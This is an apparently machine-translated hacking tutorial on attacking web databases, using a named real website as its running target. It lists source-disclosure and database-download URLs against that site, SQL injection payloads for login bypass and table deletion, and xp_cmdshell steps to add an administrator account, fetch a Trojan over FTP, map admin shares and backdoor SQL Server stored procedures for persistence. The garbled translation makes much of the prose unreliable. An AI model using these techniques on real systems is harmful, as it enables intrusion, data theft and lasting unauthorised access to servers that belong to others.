Both average Web Server uses a database to store information, and almost all websites use the database. This will present two possibilities, one is to use a small database, such as Acess, usually stored locally. The other is to use large databases, such as SQL Server, Oracle, and then in another machine, then access it through ODBC.
Since the page often needs to query various information, modify user information, etc., essentially the database is dealt with the database. This will leave the opportunity to leaving illegal users.
1. Attack on the local database.
Attacking a local database is a way to download the database, then you can open this database to get the internal users and accounts, and other useful information.
The following is "Lotus" as an example:
After scanning, I know that www.suilian.net is a virtual host, using Windows NT IIS4.0. Scanner You can use TwwWScan or other, in fact, the functions are different.
If you can see the ASP source code when you attack the IIS, then the possibility of success is great.
After testing, I found this site existed the source code exposure vulnerability. . .
You can try:
http://www.suilian.net/null.htw?ciwebhitsfile=/maillist.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile =/index.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/detnew.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/detail.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/topic4.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/titlefrm.asp &cirestriction=
None & Cihilitetype = FULL
http://www.suilian.net/null.htw?ciwebhitsfile=/chat/titlenew.asp &cirestriction=
None & Cihilitetype = FULL
What did you see?
Of course, there are many kinds of vulnerabilities leaked by the source code. You can check the vulnerability manual here.
Now you can go to view the ASP source code.
If you are not familiar with the ASP, I will introduce it.
The ASP is embedded between <% and%>. Generally written code using VBScript or Java Script.
Look at this example written in VBScript:
<%
...
SET CN1 = Server.createObject ("AdoDb.Connection")
dbpath = server.mappath ("user.mdb")
CN1.Open "driver = {Microsoft Access Driver (* .mdb)}; dbq =" & dbpath
SET RS = Server.createObject ("AdoDb.Recordset")
Rs.open "Select * from yhb", CN1, AdopenKeyset
...
%>
This is a typical code that is connected to the database.
The steps in turn are:
Establish a connection object,
Set the database path,
Open the database,
Set the record object,
Record.
Here we can know the type, name, path of the database, here in the current directory.
You can also know the table name and field name of the database.
Experienced programmers generally do not put the database name directly in the code, but set the data source in the ODBC to increase security.
Then find the existence
D: /s/suilian/chat/news.mdb
D: /S/suilian/topic22.mdb and other databases
You only need to use
http://www.suilian.net/chat/news.mdb
http://www.suilian.net/topic22.mdb
You can download it down ...
1. Break through Script restrictions.
For example, there is a text box on a page that allows you to enter the user name, but it limits you can only enter 4 characters. Many programs are limited in client restrictions and then pop up an error prompt with MSGBOX. If you need to break through this restriction when you attack, you only need to make a homepage locally, just cancel the limit, usually remove the VBScript or IavaScript restrictions, you can successfully break through.
If it is made by Java Script, simply temporarily support the browser's script. If it is
Experienced programmers often do one more over again in the process of the program. If there is an error, use the response.write or similar statement output error.
2. Breakthrough to SQL
For example, a web page requires you to enter the user name and password, so there are two text boxes waiting for your input. Now we have a user ADAM, we don't know his password, but want to log in with him.
Under normal circumstances, we enter the ADAM in the first text box, the second text box input 1234, if the password is correct, otherwise an error is reported.
The query statement in the program may be:
SQL = "Select * from user where username = '" & text1.values & "' and passwd = '" & text2.values & "'"
Execution is
SELECT * from user where username = 'adam' and passwd = '1234'
All right,
If we entered in Text2, it is not 1234, but 1234 '"&" OR 1 = 1
Our SQL statement is there,
Select * from user where username = 'adam' AND passwd = '1234' or 1 = 1
We can enter. . .
Experienced users add filters such as special characters such as single quotes in the program.
However, there are two types of login authentication methods in the general man's custom. I use ASP's VBScript: First, use Select * from ... where username = '& required.form ("username") & "password =" & request .form ("password"), then determine whether the result is empty verification. In fact, there is still a way:
Use select * from ... where username = '& request.form ("username"), then determine if the password in the result set is verified, this method is safe.
3. Vulnerabilities in multi-speech.
According to the above ideas, if the user queries all books according to the book name (eg, Linux Getting Started), the SQL statement is
Select book.name, book.content from book where bookname = 'Linux Getting Started
If we entered it is not Linux, it is Linux Getting Started 'Delete from User Where' 1 '=' 1
Thereby constitutes the deletion of the table.
The prerequisite for success is that the other party allows the execution of multiple statements.
Since the program does not process the hazard of the vulnerability generated by the boundary "'" and the type of result set and the database are related to the configuration. First, the result set, if the result set only supports a single SQL statement, then what you can do is just the kind of or '1' = '1 to log in in the password box, and other can't do it.
We can also use this approach to add users in the database.
4. After the SQL Server is installed, the management user SA is automatically created, the password is empty. And many people don't change your password after installation, so I have left a great security issue, I will say later.
The connections in the program are generally used, not using global.asa to use SSL files. SSL files are all accustomed to the Web / INCLUDE or / Inc directory. And the file name is conifn.inc, db_conn.inc, dbconninc, and so on, sometimes it is sometimes guessed.
If this directory is not read, once the file name is guess, because .inc usually not do it, directly request is not downloading is the display source file.
There is also when the primary program puts a suffix for .inc's file without processing "'", when the error message returned when the error is run, I will expose the .inc file, I have encountered several such situations. In fact, it can be set in IIS without responding to script error messages.
5. The use of the database.
If the connection user permissions in the program are extremely small, most tables can only be read, you will be difficult to have. At this time, what can be done can guess the operation of the table name and field name to delete data or tables.
The INSERT statement is hate, mainly there are many columns, but also to deal with the last ")".
I will say some MS SQL Server I am the most familiar. Its default port number is 1433. You use Telnet to connect this port of the server, if you can connect MS SQL Server, of course, this is possible.
Ok, let's talk about the utilization of the database.
If the other person's data is directly on the web server and you know the port number, there is an account simply connect with SQL Analyzer to directly connect to the database. You can perform SQL statements in it. Commonly used is the stored procedure master.dbo.xp_cmdshell, this is an extension stored procedure, which only has a parameter, which puts the parameters as the system command to the system execution.
If you manage the user, you have the right to perform this stored procedure, and you can do a lot of operations. If you use ipconfig to see IP settings, use Net User to see system users. However, the password with the NET USER / ADD username is not necessarily successful, sometimes returns a "specified login session does not exist" without execution, I am not clear. If there is no permissions, don't matter, MS SQL Server has a vulnerability, you can create a temporary stored procedure to perform, you can bypass, such as:
Create Proc #cmdshell (@cmdstr varchar (200))
AS
EXEC MASTER.DBO.XP_CMDSHELL @cmdshell
Of course, there is no permission to perform NET USER / ADD, but you can view it, you can create a file.
Reversed to create an FTP script with ECHO, pass the Trojan to an FTP site, then call the FTP with the stored procedure to use the script to download and install, then ... huh :)
If the database is not installed on the web server, there is still no way to find or change the port number.
If the database server cannot access directly from the Internet, you can use the vulnerability in the program to delete, modify the data, or join the Java Script statement to the database, usually they do not filter <> when they should be recorded, so you can use Java Script turns it to other sites or do something.
If you just change the port number, you have to look at the programs of the database user. If you are managed users, you can create an operating system user with 'exec master.dbo.xp_cmshell' Net USER / Add AAA BBB, then use 'exec Master.dbo.xp_cmdshell 'Net localgroup / add administrators AAA to upgrade it to superuser.
If the NetBIOS of this server is bound to TCP / IP, and C $, D $ and other management shares exist, huh, congratulations, you use NET USE Z: / IP Address $ "BBB" / user: "under the DOS command. AAA "You can map the entire C disk of the other party to a local network driver z:
6. How to stay in the database.
Creating a user's sp_addlogin, the sp_addsrvrolememberbember assigned by the user is to use a statement to determine whether the user has permission, that is, the user can execute it, and it is again to determine if the user has the right to execute.
When you attack a database, you can use its Enterprise Manager to change these stored procedures because these stored procedures are not encrypted.
You can add a condition where it is determined, and when this condition is satisfied, it does not directly execute it, regardless of whether the user is called.
However, I have to pay attention to it. At this time, it is a user. If you want to change it, you can remove the name to sp_addlogin in the sysobjects table, and then record the same version of the MS SQL Server that has not changed. Yes.
Of course, don't forget that these defaults cannot be modified manually. To modify the parameters of SQL Server first, don't forget to change it again. You can always create SQL Server management users at any time.
7. Database Scanning Tools.
ISS Database Scanner
